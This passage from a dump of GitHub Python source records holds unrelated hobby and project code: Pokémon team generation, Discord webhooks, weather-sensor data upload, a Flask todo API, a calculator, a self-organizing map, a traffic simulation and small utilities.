6\n\n # Get all legendary Pokémon\n legendary_pokemon = [pokemon for pokemon in self.pokemon_list if pokemon.legendary]\n\n # Select random legendary Pokémon for the team\n team = random.sample(legendary_pokemon, k=team_size)\n return team\n \n def get_rainbow_team(self):\n team = []\n\n # Random Fire type 1\n fire_pokemon = random.choice(self.get_pokemon_by_type1(\"Fire\"))\n team.append(fire_pokemon)\n\n # Random Fighting or Ground type 1\n fighting_ground_pokemon = random.choice(self.get_pokemon_by_type1(\"Fighting\") + self.get_pokemon_by_type1(\"Ground\"))\n team.append(fighting_ground_pokemon)\n\n # Random Electric type 1\n electric_pokemon = random.choice(self.get_pokemon_by_type1(\"Electric\"))\n team.append(electric_pokemon)\n\n # Random Grass type 1\n grass_pokemon = random.choice(self.get_pokemon_by_type1(\"Grass\"))\n team.append(grass_pokemon)\n\n # Random Water type 1\n water_pokemon = random.choice(self.get_pokemon_by_type1(\"Water\"))\n team.append(water_pokemon)\n\n # Random Poison or Ghost type 1\n poison_ghost_pokemon = random.choice(self.get_pokemon_by_type1(\"Poison\") + self.get_pokemon_by_type1(\"Ghost\"))\n team.append(poison_ghost_pokemon)\n\n return team\n\n\n\n\n\n","repo_name":"EdwardGHill/pokedex1","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18205410876","text":"#!/usr/bin/env python3\n\"\"\"Discoord webhook Sanchez images\"\"\"\n\n\n# import libraries\nimport os\nimport sys\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nimport wxcutils\n\n\ndef webhooks(w_config_path, w_config_file, w_site_config_file, w_imagesfile, w_satellite,\n w_location, w_colour, w_description):\n \"\"\"send data to webhooks as configured\"\"\"\n MY_LOGGER.debug('webhooks called with %s %s %s %s %s %s %s %s',\n w_config_path, w_config_file, w_site_config_file,\n w_imagesfile, w_satellite,\n 
w_location, w_colour, w_description)\n\n # convert w_colour from hex string to an int\n w_colour = int(w_colour, 16)\n\n w_config = wxcutils.load_json(w_config_path, w_config_file)\n w_site_config = wxcutils.load_json(w_config_path, w_site_config_file)\n\n MY_LOGGER.debug('Iterate through webhooks')\n for w_row in w_config['webhooks']:\n MY_LOGGER.debug('webhook last 3 chars = %s', w_row[len(w_row) - 3:])\n w_webhook = DiscordWebhook(url=w_row)\n\n # create embed object for webhook\n w_embed = DiscordEmbed(title=w_satellite, description=w_location, color=w_colour)\n\n # set image\n w_embed.set_image(url=w_imagesfile)\n\n # set footer\n w_embed.set_footer(text=w_config['footer'].replace('[SITE]', w_site_config['website']))\n\n # add fields to embed\n w_embed.add_embed_field(name='Satellite', value=':satellite_orbital:' + w_satellite)\n if w_description != '':\n w_embed.add_embed_field(name='Pass Description', value=w_description)\n\n # add embed object to webhook\n w_webhook.add_embed(w_embed)\n\n w_response = w_webhook.execute()\n MY_LOGGER.debug('response = %s', w_response)\n\n# setup paths to directories\nHOME = os.environ['HOME']\nAPP_PATH = HOME + '/wxcapture/'\nCODE_PATH = APP_PATH + 'process/'\nLOG_PATH = CODE_PATH + 'logs/'\nOUTPUT_PATH = APP_PATH + 'output/'\nIMAGE_PATH = OUTPUT_PATH + 'images/'\nWORKING_PATH = CODE_PATH + 'working/'\nCONFIG_PATH = CODE_PATH + 'config/'\n\n# start logging\nMODULE = 'discord'\nMY_LOGGER = wxcutils.get_logger(MODULE, LOG_PATH, MODULE + '.log')\nMY_LOGGER.debug('-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+')\nMY_LOGGER.debug('Execution start')\nMY_LOGGER.debug('APP_PATH = %s', APP_PATH)\nMY_LOGGER.debug('CODE_PATH = %s', CODE_PATH)\nMY_LOGGER.debug('LOG_PATH = %s', LOG_PATH)\nMY_LOGGER.debug('OUTPUT_PATH = %s', OUTPUT_PATH)\nMY_LOGGER.debug('IMAGE_PATH = %s', IMAGE_PATH)\nMY_LOGGER.debug('WORKING_PATH = %s', WORKING_PATH)\nMY_LOGGER.debug('CONFIG_PATH = %s', CONFIG_PATH)\n\n\ntry:\n # webhook\n MY_LOGGER.debug('Webhooking pass')\n # files are ~ 2MB, so can tweet full size image\n DISCORD_IMAGE_URL = 'https://kiwiweather.com/gk-2a/sanchez.jpg'\n MY_LOGGER.debug('discord_image_url = %s', DISCORD_IMAGE_URL)\n try:\n webhooks(CONFIG_PATH, 'config-discord.json', 'config.json',\n DISCORD_IMAGE_URL,\n 'GK-2A', 'Geostationary Image',\n 'ff0000',\n 'IR Image CLAHE-Sanchez processed')\n except:\n MY_LOGGER.critical('Discord exception handler: %s %s %s',\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])\n\nexcept:\n MY_LOGGER.critical('Global exception handler: %s %s %s',\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])\n\nMY_LOGGER.debug('Execution end')\nMY_LOGGER.debug('-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+')\n","repo_name":"wxcapture/wxcapture","sub_path":"gk-2a-code/wxcapture/process/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"18092102758","text":"from navmazing import NavigateToSibling\nfrom widgetastic.widget import View\nfrom widgetastic_patternfly import Accordion\nfrom widgetastic_patternfly import Dropdown\n\nfrom cfme.base import Server\nfrom cfme.common import BaseLoggedInPage\nfrom cfme.utils.appliance.implementations.ui import CFMENavigateStep\nfrom cfme.utils.appliance.implementations.ui import navigator\nfrom widgetastic_manageiq import ManageIQTree\n\n\nclass ControlExplorerView(BaseLoggedInPage):\n\n @property\n def in_control_explorer(self):\n 
return (\n self.logged_in_as_current_user and\n self.navigation.currently_selected == ['Control', 'Explorer'])\n\n @property\n def is_displayed(self):\n return self.in_control_explorer\n\n @View.nested\n class policy_profiles(Accordion): # noqa\n ACCORDION_NAME = \"Policy Profiles\"\n\n tree = ManageIQTree()\n\n @View.nested\n class policies(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class events(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class conditions(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class actions(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class alert_profiles(Accordion): # noqa\n ACCORDION_NAME = \"Alert Profiles\"\n\n tree = ManageIQTree()\n\n @View.nested\n class alerts(Accordion): # noqa\n tree = ManageIQTree()\n\n configuration = Dropdown(\"Configuration\")\n\n\n@navigator.register(Server)\nclass ControlExplorer(CFMENavigateStep):\n VIEW = ControlExplorerView\n prerequisite = NavigateToSibling(\"LoggedIn\")\n\n def step(self, *args, **kwargs):\n self.view.navigation.select(\"Control\", \"Explorer\")\n","repo_name":"ManageIQ/integration_tests","sub_path":"cfme/control/explorer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"77"} +{"seq_id":"29371883387","text":"import json\nimport requests\nimport os\nfrom json import encoder\n\nfrom customlogging import LogLevel, logKibana\nencodeObj = encoder.JSONEncoder()\ndevice_key = 'sound-detector'\n\n\nencoder = json\n\n\ndef register():\n logKibana(LogLevel.DEBUG, \"registering sender\")\n\n if os.environ.get(\"server_origin\") is None:\n raise RuntimeError(\"missing server_origin environment variable\")\n resp = requests.post(os.environ.get(\"server_origin\") + \"/rest/sender\", headers={\n 'content-type': 'application/json',\n \"http_x_forwarded_for\": \"192.168.178.___\"\n }, verify=False, data=encodeObj.encode({\n \"deviceKey\": device_key,\n \"name\": 'Audio Detection',\n \"description\": 'recognize audio and trigger depending on the context'\n }))\n logKibana(LogLevel.DEBUG, \"register request done\",\n args=dict(status=resp.status_code))\n if(resp.status_code != 200 and resp.status_code != 409):\n logKibana(LogLevel.ERROR, \"registering sender\", args=dict(\n text=resp.text, status=resp.status_code))\n","repo_name":"jonnytest1/homeautomation","sub_path":"clients/sound-detection/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11602967276","text":"#!/usr/bin/env python3\n#$Header: /home/pi/WX/bin/RCS/getAnemometerData.py,v 1.3 2017/02/06 19:37:09 pi Exp pi $\n\nimport subprocess\nimport serial\nimport datetime\nimport time\nimport re\nimport os\n# The paho module was installed with: sudo pip3 install paho-mqtt\nimport paho.mqtt.publish as publish\nimport anemometerJson\n\ndatafile = '/home/pi/WX/data/anemometerData.txt'\ndatafile_json = '/home/pi/WX/data/anemometerData.json'\nawskey = '/home/pi/WX/aws/wx-website.pem'\ndokey = '/home/pi/WX/digitalOcean/do1_rsa'\nawsdatafile = '/home/ubuntu/WX/data/anemometerData.txt'\ndodatafile = '/home/ben/WX/data/anemometerData.txt'\n\n# -----------\n# Function to convert anemometer average voltage to wind speed in miles/hour\ndef convert (bytes) :\n voltageMin = 0.41\n voltageMax = 2.01\n speedMax = 32.0\n speed = 0.0 # meters/second\n 
string = str(bytes)\n results = re.findall('([\\d\\.\\d]+)', string)\n twoMinuteAverageVoltage = float(results[0])\n fiveSecondAverageVoltage = float(results[1])\n # Convert voltage values to wind speeds in mph (1 m/s = 2.23694 mph)\n if ( twoMinuteAverageVoltage <= voltageMin ) :\n windSpeed = 0.0 # Set wind speed to zero if voltage is less than or equal to the minimum value\n else :\n # For voltages above minimum value, use the linear relationship to calculate wind speed\n windSpeed = ((( twoMinuteAverageVoltage - voltageMin ) * speedMax ) / ( voltageMax - voltageMin ))\n if ( fiveSecondAverageVoltage <= voltageMin ) :\n gustSpeed = 0.0 # Set wind speed to zero if voltage is less than or equal to the minimum value\n else :\n # For voltages above minimum value, use the linear relationship to calculate wind speed\n gustSpeed = ((( fiveSecondAverageVoltage - voltageMin ) * speedMax ) / ( voltageMax - voltageMin ))\n return (round((windSpeed * 2.23694), 1), round((gustSpeed * 2.23694), 1))\n# -----------\n\n\n# -----------\ntext = \"A\"\n\ntry :\n # Open serial port and send the letter 'A' command to the Arduino\n ser = serial.Serial('/dev/ttyUSB0', 9600)\n time.sleep(0.1)\n ser.write(text.encode('utf-8'))\n time.sleep(0.1)\n # Read the data (bytes packet) coming back from the Arduino\n bytes = ser.readline()\n ser.close()\n #fv = open(\"/home/pi/WX/data/data_string.txt\", \"a\")\n #fv.write(str(bytes) + \"\\n\")\n #fv.close()\n # print(bytes)\n # Call conversion function to get wind speeds (average, gust)\n windSpeed, gustSpeed = convert(bytes)\n # print(windSpeed)\n # print(gustSpeed)\n # Timestamps\n # print('{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now()))\n ts = time.time()\n # print(round(ts, 1))\n # print(\"...\")\n # Write data to file, which will be sent to the AWS server\n f = open(\"%s\" % datafile, \"w\")\n f.write('{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now()))\n f.write(\",\" + str(round(ts, 1)) + \",\" + str(windSpeed) + \",\" + str(gustSpeed) + \"\\n\")\n f.close()\n # Create json data file\n anemometerJson.create_json(datafile)\n # Publish to local mosquitto MQTT server (this feeds home web server)\n publish.single(\"wind\", str(windSpeed) + \",\" + str(gustSpeed), hostname=\"192.168.1.102\")\n\nexcept :\n pass\n# -----------\n\n# Send file 'anemometerData.txt' to Amazon AWS t2.micro instance and Digital Ocean droplet using secure copy (scp)\n#result1 = subprocess.getoutput(\"scp -i /home/pi/WX/aws/wx-website.pem /home/pi/WX/data/anemometerData.txt ubuntu@35.164.26.176:/home/ubuntu/WX/data\")\n#time.sleep(3)\n#result1 = subprocess.getoutput(\"ssh -i /home/pi/WX/aws/wx-website.pem ubuntu@cspa16403.hopto.org docker cp /home/ubuntu/WX/data/anemometerData.txt wxdata:/datavolume1/data\")\n#result2 = subprocess.getoutput(\"scp -i /home/pi/WX/digitalOcean/do1_rsa /home/pi/WX/data/anemometerData.txt root@45.55.89.253:/home/ben/WX/data\")\n\n# New, more streamlined transfer of anemomter data to servers\n#-------\n# Send file to Amazon server\nresult = subprocess.getoutput('cat %s | ssh -i %s ubuntu@cspa16403.hopto.org \\\n\"cat > %s; docker cp %s wxdata:/datavolume1/data\"' % (datafile, awskey, awsdatafile, awsdatafile))\n# Send file to Digital Ocean server\nresult = subprocess.getoutput('cat %s | ssh -i %s root@wxben.ddns.net \\\n\"cat > %s\"' % (datafile, dokey, dodatafile))\n#-------\n\n# Update winddata.rrd database\ndevnull = open(os.devnull, 'w')\nsubprocess.call([\"/home/pi/WX/rrd/bin/update_wind_rrd.sh\"], stdout=devnull)\n\n# Send file to AWS S3 storage 
bucket\ndatafile_json_basename = os.path.basename(datafile_json)\nsubprocess.call([\"/usr/local/bin/aws\", \"s3\", \"cp\", datafile_json, \"s3://cspawx.ddns.net/data/\" + datafile_json_basename, \"--acl\", \"public-read\"], stdout=devnull)\ndevnull.close()\n","repo_name":"benrb3/S3-WX","sub_path":"getAnemometerData.py","file_name":"getAnemometerData.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71718541370","text":"from flask import Flask,jsonify, request,abort \n\napp = Flask(__name__)\n\ntarefas = [\n {\n 'id': 1,\n 'titulo': u'Ir na padaria',\n 'descricao': u'trazer leite, pão e manteiga', \n 'done': True\n },\n {\n 'id': 2,\n 'titulo': u'Ir no mercado',\n 'descricao': u'trazer frutas, verduras e legumes', \n 'done': False\n }\n]\n\n@app.route('/tarefas', methods=['GET'])\ndef get_tasks():\n return jsonify({'tarefas': tarefas})\n\n\n##{\n##\t\"titulo\":\"Ir na feira\",\n##\t\"descricao\":\"trazer banana, maçã e limão\"\n##}\n\n@app.route('/new', methods=['POST'])\ndef new():\n content = request.json\n tit = content['titulo']\n desc = content['descricao']\n tarefas = [\n {\n 'id': 3,\n 'titulo': tit,\n 'descricao': desc, \n 'done': False\n }]\n \n return jsonify({'tarefas': tarefas})\n\nif __name__ == '__main__':\n app.run(\"0.0.0.0\", port=80, debug=True)\n","repo_name":"LuigiTavolaro/ApisPythonAzureWebAppsForContainers","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"9788885188","text":"import os\nimport time\n\n\n\ndef seperator():\n print(\"-\" * 30)\n\n\ndef print_menu():\n\n # is there a way to clear the console\n seperator()\n print('Welcome to PyCalc')\n seperator()\n\n print('[1] - Add')\n print('[2] - Subtract')\n print('[3] - Multiply')\n print('[4] - Divide')\n print('[x] - Close')\n\n seperator()\n\n\ndef clear_screen():\n os.system(\"cls\")\n\n\ndef sum(num1, num2):\n return num1 + num2\n\n\ndef Subtract(num1, num2):\n return num1 - num2\n\n\ndef Multiply(num1, num2):\n return num1 * num2\n\n\ndef Divide(num1, num2):\n\n if num2 == 0:\n return print('ZeroDivisionError: float division by zero')\n\n return num1 / num2\n\n\nopc = ''\nwhile (opc != 'x'):\n print_menu()\n opc = input('Please select an option: ')\n\n if (opc == 'x'):\n clear_screen()\n break # break = finish loop\n\n num1 = float(input('First number: '))\n num2 = float(input('Second number: '))\n\n if (opc == '1'):\n clear_screen()\n print(\"Result: \" + str(sum(num1, num2)))\n time.sleep(3)\n\n elif (opc == '2'):\n clear_screen()\n print(\"Result: \" + str(Subtract(num1, num2)))\n time.sleep(3)\n\n elif (opc == '3'):\n clear_screen()\n print(\"Result: \" + str(Multiply(num1, num2)))\n time.sleep(3)\n\n elif (opc == '4'):\n clear_screen()\n print(\"Result: \" + str(Divide(num1, num2)))\n time.sleep(3)\n\n\ninput('Press Enter to continue...')\n\nprint('Byte Byte!')\n\n\n\n\n# on div show error if the user tries to divide by 0\n# return 0 from the fn\n","repo_name":"artlemus/python_calc","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35950262251","text":"import numpy as np\n\nfrom SelfOrganizingMap.NeighborhoodFunction.NeighborhoodFunction import NeighborhoodFunction\nfrom 
SelfOrganizingMap.Neuron import Neuron\nfrom util.MathUtil import euclidean_distance\nfrom printer import save_neurons_connections_over_data_points\n\n\nclass SelfOrganizingMap:\n\n def __init__(self, matrix_height: int, matrix_width: int, input_length: int,\n neighborhood_function: NeighborhoodFunction, learning_rate: float,\n minimum_tiredness_potential: float):\n self.neurons = self._init_neurons(matrix_height, matrix_width, input_length)\n self.matrix_height = matrix_height\n self.matrix_width = matrix_width\n self.neighborhood_function = neighborhood_function\n self.learning_rate = learning_rate\n self.minimum_tiredness_potential = minimum_tiredness_potential\n\n self._update_active_neurons()\n self.quantization_errors = []\n\n def react_to_input(self, vector: np.array):\n if len(self.active_neurons) != self.matrix_width * self.matrix_height:\n self._reset_neurons_tiredness()\n return self.find_closest_active_neuron(self, vector).weights\n\n def neurons_to_array(self):\n array = []\n for row in self.neurons:\n for neuron in row:\n array.append(neuron.weights)\n\n return np.array(array)\n\n @staticmethod\n def _init_neurons(matrix_height: int, matrix_width: int, dimension: int):\n return [[Neuron(dimension, x, y) for x in range(0, matrix_width)] for y in range(0, matrix_height)]\n\n def _calculate_quantization_error(self, data):\n self._reset_neurons_tiredness()\n data_sample = data[np.random.choice(np.arange(len(data)), int(len(data) / 10)), :]\n\n summed_distance = 0\n for d in data_sample:\n closest_neuron = SelfOrganizingMap.find_closest_active_neuron(self, d)\n summed_distance += euclidean_distance(d, closest_neuron.weights) ** 2\n\n return summed_distance / len(data_sample)\n\n def _reset_neurons_tiredness(self):\n active_neurons = []\n for x in range(self.matrix_height):\n for y in range(self.matrix_width):\n self.neurons[x][y].tiredness_potential = 1\n active_neurons.append(self.neurons[x][y])\n\n self.active_neurons = active_neurons\n\n def _update_neurons_tiredness(self, winner: Neuron):\n for x in range(self.matrix_height):\n for y in range(self.matrix_width):\n if self.neurons[x][y] == winner:\n winner.tiredness_potential -= self.minimum_tiredness_potential\n else:\n self.neurons[x][y].tiredness_potential += 0.1\n if self.neurons[x][y].tiredness_potential > 1:\n self.neurons[x][y].tiredness_potential = 1\n\n def _update_active_neurons(self):\n active_neurons = []\n for x in range(0, self.matrix_height):\n for y in range(0, self.matrix_width):\n if self.neurons[x][y].tiredness_potential > self.minimum_tiredness_potential:\n active_neurons.append(self.neurons[x][y])\n\n if len(active_neurons) == 0:\n for x in range(0, self.matrix_height):\n for y in range(0, self.matrix_width):\n self.neurons[x][y].tiredness_potential = 1\n active_neurons.append(self.neurons[x][y])\n\n self.active_neurons = active_neurons\n\n def learn(self, data, epochs: int, visualize=True):\n counter = 0\n for e in range(0, epochs):\n print('Epoch = ', e)\n self.quantization_errors.append(self._calculate_quantization_error(data))\n np.random.shuffle(data)\n learning_speed = self.learning_rate / (1 + e / epochs)\n for d in data:\n if visualize and counter % 100 == 0:\n save_neurons_connections_over_data_points(self, data, str(counter))\n counter += 1\n\n closest_neuron: Neuron = self.find_closest_active_neuron(self, d)\n self.neighborhood_function.apply(self, closest_neuron, learning_speed, d)\n self._update_neurons_tiredness(closest_neuron)\n self._update_active_neurons()\n 
self.quantization_errors.append(self._calculate_quantization_error(data))\n\n @staticmethod\n def find_closest_active_neuron(self, data):\n closest_neuron = self.active_neurons[0]\n smallest_distance = euclidean_distance(closest_neuron.weights, data)\n\n for n in self.active_neurons:\n distance = euclidean_distance(n.weights, data)\n if distance < smallest_distance:\n closest_neuron = n\n smallest_distance = distance\n return closest_neuron\n\n def activation_count_map(self, data):\n activation = np.zeros((self.matrix_width, self.matrix_height))\n for d in data:\n winner = self.find_closest_active_neuron(self, d)\n activation[winner.x][winner.y] += 1\n return activation\n\n def distance_map(self):\n pass\n","repo_name":"ArturPrzybysz/Clustering","sub_path":"src/SelfOrganizingMap/SelfOrganizingMap.py","file_name":"SelfOrganizingMap.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73361423609","text":"# coding = utf-8\nfrom simulation import *\n# Change next line with the map you want to use\nfrom maps.map_from_data import *\nfrom time import *\nfrom math import exp\nimport decimal\n\n# Discretize time\ndecimal.getcontext().prec = 8 # Set the precision for the decimal module\nt = decimal.Decimal(0)\ndt_s = decimal.Decimal(1)/decimal.Decimal(100)\ndt_g = 100 # [ms] # Time interval for graphic update()\n\ndelay = 0\naverage_speed = 0\n\n# file = open(\"results.txt\", \"w\")\n\ndef next_steps(dt_d, steps):\n \"\"\"Update all the simulation :\n - vehicle acceleration, velocity and position\n - vehicle crossing order for each cross according to the priority\n - traffic light state \"\"\"\n T = perf_counter()\n global t\n global average_speed\n dt = float(dt_d)\n\n # if t == 0 or t == 2 or t == 4 :\n # veh = Vehicle(roads[0], crosses[0])\n # vehicles.append(veh)\n # roads[0].incoming_veh(veh, crosses[0])\n\n for i in range(steps):\n # file.write(\"{}\\t\".format(t))\n average_speed = 0\n # Generate vehicles\n for gen in generators:\n gen.generate(t)\n\n for cross in crosses:\n cross.updateTrafficLights(t)\n cross.get_intentions()\n\n # Update acceleration, speed and position of each vehicle\n for veh in vehicles:\n try:\n a = veh.acceleration_IIDM()\n veh.x += veh.v*dt + max(0, 0.5*a*dt*dt)\n veh.v = max(0, veh.v + a*dt)\n average_speed += veh.v\n\n # file.write(\"{} {} {} \".format(a, veh.v, veh.x))\n\n if veh.slow_down > 1:\n veh.slow_down -= 1\n elif veh.slow_down == 1:\n veh.slow_down = 0\n veh.v0 = veh.road.speed_limit\n\n if (veh.road.length - veh.x) <= ((veh.v*veh.v)/(2*veh.b_max) + 30) and veh.slow_down == 0 :\n veh.turn_speed()\n\n if veh.leader != None and veh.leader.veh_type != \"stop\" and veh.leader.road == veh.road and veh.destination_cross != veh.leader.destination_cross:\n veh.decision = False\n veh.find_leader()\n\n except:\n next_road_id = None if veh.next_road == None else veh.next_road.id\n leader_index = None if veh.leader == None or veh.leader.veh_type == \"stop\" else vehicles.index(veh.leader)\n\n print(\"ERROR DURING THE SIMULATION, while working on {}, going from road {} to {}, following {} on {}, spacing: {}\"\n .format(vehicles.index(veh), veh.road.id, next_road_id, leader_index, veh.leader.road.id, veh.spacing_with_leader()))\n raise\n\n # file.write(\"\\n\")\n\n if len(vehicles) > 0:\n average_speed = (average_speed / len(vehicles)) * 3.6\n\n # Check if the vehicles must change road\n for road in roads:\n road.outgoing_veh(road.first_vehicle(road.cross1))\n 
road.outgoing_veh(road.first_vehicle(road.cross1))\n road.outgoing_veh(road.first_vehicle(road.cross2))\n\n for veh in deleted_vehicles:\n # Delete the vehicles that left the map\n gui.map.delete(veh.rep)\n gui.map.delete(veh.brake_rep)\n deleted_vehicles.clear()\n\n t+= dt_d\n\n global delay\n delay = perf_counter() - T\n\ndef update():\n \"\"\"Update the graphic interface :\n Compute the correct number of simulation steps\n Update the position of the vehicles, the traffic lights and the leadership arrows\"\"\"\n\n global delay\n global average_speed\n T = perf_counter()\n if gui.controls.play.get():\n next_steps(dt_s, int((dt_g/(1000*float(dt_s)))*gui.controls.speed.get()))\n gui.map.draw_vehicle(vehicles)\n gui.map.draw_traffic_lights(crosses)\n gui.controls.time_str.set(\"Current time : \" + str(t) + \" s.\")\n gui.controls.nb_veh.set(len(vehicles))\n gui.controls.avg_speed.set(\"{:.4f}\".format(average_speed))\n mouseover()\n if gui.controls.leadership.get():\n gui.map.draw_leadership(vehicles)\n else:\n gui.map.delete(\"leadership\")\n delay += perf_counter() - T + delay\n gui.map.after(int(dt_g * exp(-delay*1000/dt_g)), update)\n else:\n mouseover()\n gui.map.after(dt_g, update)\n if gui.controls.leadership.get():\n gui.map.draw_leadership(vehicles)\n else:\n gui.map.delete(\"leadership\")\n\n\nmouse_x, mouse_y = 0, 0\n\ndef click(event):\n \"\"\"Slow down a vehicle when clicking on it\"\"\"\n x, y = gui.map.canvasx(event.x), gui.map.canvasy(event.y)\n objects = gui.map.find_overlapping(x,y,x,y)\n for obj in objects:\n tags = gui.map.gettags(obj)\n if \"vehicle\" in tags:\n for veh in vehicles:\n if veh.rep == obj:\n veh.v0 = veh.v/3\n veh.slow_down = 10*int(1/dt_s)\n break\n\ndef mouseover():\n \"\"\"Update the text to give information to the user\"\"\"\n x, y = gui.map.canvasx(mouse_x), gui.map.canvasy(mouse_y)\n objects = gui.map.find_overlapping(x,y,x,y)\n txt = \"\"\n for obj in objects:\n tags = gui.map.gettags(obj)\n if \"road\" in tags:\n for road in roads:\n if road.rep == obj:\n txt = txt + \"Road {} (angle: {:.2f}) \".format(roads.index(road), road.angle)\n break\n elif \"cross\" in tags:\n for cross in crosses:\n if cross.rep == obj:\n txt = txt + \"Cross \" + str(crosses.index(cross)) + \" \"\n break\n elif \"vehicle\" in tags:\n for veh in vehicles:\n if veh.rep == obj:\n next_road_id = None if veh.next_road == None else veh.next_road.id\n leader_index = None if veh.leader == None or veh.leader.veh_type == \"stop\" else vehicles.index(veh.leader)\n leader_index = \"stop\" if veh.leader != None and veh.leader.veh_type == \"stop\" else leader_index\n txt = txt + \"Vehicle {} \\n(speed: {:.2f}, v0: {:.2f}, d_to_cross: {:.2f}, going to: {}, leader: {}, decision: {})\".format(vehicles.index(veh), veh.v*3.6, veh.v0*3.6, veh.d_to_cross(), next_road_id, leader_index, veh.decision)\n break\n gui.map.itemconfigure(tag, text=txt)\n gui.map.coords(tag, x+15, y+15)\n\ndef moved(event):\n global mouse_x, mouse_y\n mouse_x, mouse_y = event.x, event.y\n\ngui.map.bind(\"<Motion>\", moved)\ngui.map.bind(\"<Button-1>\", click)\ntag = gui.map.create_text(10, 10, text=\"\", anchor=\"nw\")\n\ngui.map.after(dt_g, update)\ngui.root.mainloop()\n","repo_name":"FabAlchemy/traffic-simulator","sub_path":"Traffic Simulation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"19454426292","text":"from django.urls import path, re_path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index),\n path('api/admin_login', views.login_admin, name=\"login\"),\n path('api/events', views.get_events, name=\"get_events\"),\n path('api/people', views.get_people, name=\"get_people\"),\n path('api/add_person', views.add_person, name=\"add_person\"),\n re_path(\"/\", views.index, name=\"index\")\n]","repo_name":"smillett162/csa-project","sub_path":"csa_website/frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24639312634","text":"import os\r\nimport cv2\r\nrename='jpg'\r\nbad_images=[]\r\nbad_ext=[]\r\nfor subdir, dirs, files in os.walk(r'C:\\Python_Content\\People_2'):\r\n for filename in files:\r\n filepath = subdir + os.sep + filename\r\n #Get the extension and remove . from it\r\n base_file, ext = os.path.splitext(filepath)\r\n ext = ext.replace('.','') \r\n print (filepath)\r\n if ext in rename:\r\n #Create the new file name\r\n new_ext = rename\r\n new_file = base_file + '.' + 'jpeg'\r\n #Create the full old and new path\r\n old_path = os.path.join(r'C:\\Users\\meima\\Downloads\\People', filepath)\r\n new_path = os.path.join(r'C:\\Users\\meima\\Downloads\\People', new_file)\r\n\r\n #Rename the file\r\n os.rename(old_path, new_path)\r\n \r\nif len(bad_images) !=0:\r\n print('improper image files are listed below')\r\n for i in range (len(bad_images)):\r\n os.remove(bad_images[i])\r\n \r\nelse:\r\n print(' no improper image files were found')\r\n \r\n\r\n\r\n'''\r\nif os.path.isfile(filepath):\r\n try:\r\n img=cv2.imread(filepath)\r\n shape=img.shape\r\n except:\r\n print('file ', filepath, ' is not a valid image file')\r\n bad_images.append(filepath)\r\n else:\r\n print('*** fatal error, you have a sub directory in class directory ')\r\n'''","repo_name":"Mmei99/Projects-ML-Class","sub_path":"Change_Ext.py","file_name":"Change_Ext.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28413293863","text":"# Please write a function that splits a list into two lists. The first\n# should contain positive even keys, the second negative odd keys;\n# the remaining elements should be removed from memory. The function takes\n# pointers to the data list and pointers to the result lists. 
The function\n# should return the number of removed elements\n\n\nclass Node:\n def __init__(self, val, next = None):\n self.val = val\n self.next = next\n#end class\n\n\ndef put_guardian(p): # creates a guardian (sentinel) node \n g = Node( None, p )\n return g \n#end def \n\n\ndef add(p, new_val): # recursive insertion\n\n if p.next is None:\n q = Node(new_val)\n p.next = q\n return\n\n if p.next is not None:\n if p.next.val == new_val:\n return\n\n elif p.next.val > new_val:\n q = Node(new_val)\n q.next = p.next \n p.next = q\n else:\n add(p.next, new_val)\n #end if \n#end def\n\n\ndef print_all(p):\n while p is not None:\n print(p.val, end = \" \")\n p = p.next\n #end while\n print()\n#end def\n\n\ndef create_linked_list_with_given_elements(L):\n g = Node(None)\n p = g\n\n for elem in L:\n p.next = Node(elem)\n p = p.next\n \n return g.next\n#end def\n\n\n\ndef separation(p,a,b):\n p = put_guardian( p )\n cnt = 0\n q = p\n\n while p.next is not None:\n\n if p.next.val % 2 == 0 and p.next.val > 0:\n tmp = p.next\n p.next = p.next.next\n\n # Prepend the element to the front of linked list a:\n tmp.next = a.next \n a.next = tmp \n \n elif p.next.val % 2 == 1 and p.next.val < 0:\n tmp = p.next\n p.next = p.next.next\n\n # Prepend the element to the front of linked list b:\n tmp.next = b.next \n b.next = tmp \n \n else:\n p.next = p.next.next\n cnt += 1 \n #end while\n return cnt,a,b\n # also return the 